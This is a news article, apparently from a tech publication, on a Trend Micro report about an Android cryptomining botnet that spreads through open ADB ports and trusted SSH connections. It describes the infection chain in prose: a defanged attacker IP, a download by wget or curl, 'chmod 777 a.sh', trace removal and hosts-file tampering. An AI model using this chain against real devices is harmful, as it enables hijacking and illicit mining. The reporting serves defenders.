A new botnet is making the rounds by abusing Android Debug Bridge (ADB) and SSH to enslave new Android devices to its network.
The botnet malware, as observed by Trend Micro, has spread to 21 countries and is currently most prevalent in South Korea.
While many Android devices have the ADB developer function and command-line tool disabled by default, as it is used to debug apps and this is not a feature an average Android user requires, some devices do ship with this feature enabled and this may open up smartphones and tablets to exploit.
The researchers say that the botnet, which specializes in cryptocurrency mining, abuses the fact that open ADB ports do not have authentication imposes as a default setting. Given an open door to walk through, in a way similar to the Satori botnet, the new malware will spread from the infected host to any vulnerable system which has previously shared an SSH connection.
At the beginning of the infection chain, the IP address 45[.]67[.]14[.]179 will connect to a device running ADB and uses the ADB command shell to tweak the system's working directory to "/data/local/tmp." This modification is based on the fact that files with .tmp often have default execution permissions.
The botnet will then perform a series of scans and will analyze whether the target system is a honeypot or not -- an indication security researchers are waiting in the wings to reverse-engineer the threat -- as well as to determine what kind of operating system is in place.
A command, wget, is then launched to download the malware payload. If wget fails, curl is used. An additional command, chmod 777 a.sh, is executed to change the permission settings of the malicious payload, and then further commands are imposed to remove traces of the malware's dropper.
The payload itself, once pulled from the attacker's server, allows the botnet to select one of three potential miners depending on the victim system's manufacturer, architecture, processor type, and hardware.
All three miners are hosted on the same domain.
An interesting feature of the malware is the ability to enable HugePages to boost the system's capacity to support pages larger than those usually permitted by default. By doing so, this can potentially ramp up how much illicit cryptocurrency mining can be performed.
In addition, the malware will modify the device's hosts file to block competing miners.
The propagation system the botnet uses is nothing new but can be difficult to prevent. The malware spreads through SSH and according to Trend Micro, "any system that has connected to the original victim being attacked via SSH is likely to have been listed as a "known" device on its operating system."
This may include other mobile devices or Internet of Things (IoT) products.
"Being a known device means the two systems can communicate with each other without any further authentication after the initial key exchange, each system considers the other as safe," the researchers say. "The presence of a spreading mechanism may mean that this malware can abuse the widely used process of making SSH connections."
After the installation has completed and a miner is hard at work, the malware will attempt to spread to other devices and will also continue to delete its payloads in an attempt to fly under the radar.
The threat of mobile malware has been steadily growing and threat actors are constantly evolving their techniques to compromise our devices.
In recent weeks another cyberattack group, known as Outlaw, was spotted spreading a cryptocurrency mining botnet across China through brute-force attacks against servers. However, an examination of the malware's code revealed an as-of-yet unused Android APK which may suggest Android devices will be on the botnet's target list in the future.
Previous and related coverage
- Facebook debuts Libra cryptocurrency: a Bitcoin killer?
- Fish ponds disguised theft of oil field power in cryptocurrency mining scheme
- Outlaw hackers return with cryptocurrency mining botnet
Have a tip? Get in touch securely via WhatsApp | Signal at +447713 025 499, or over at Keybase: charlie0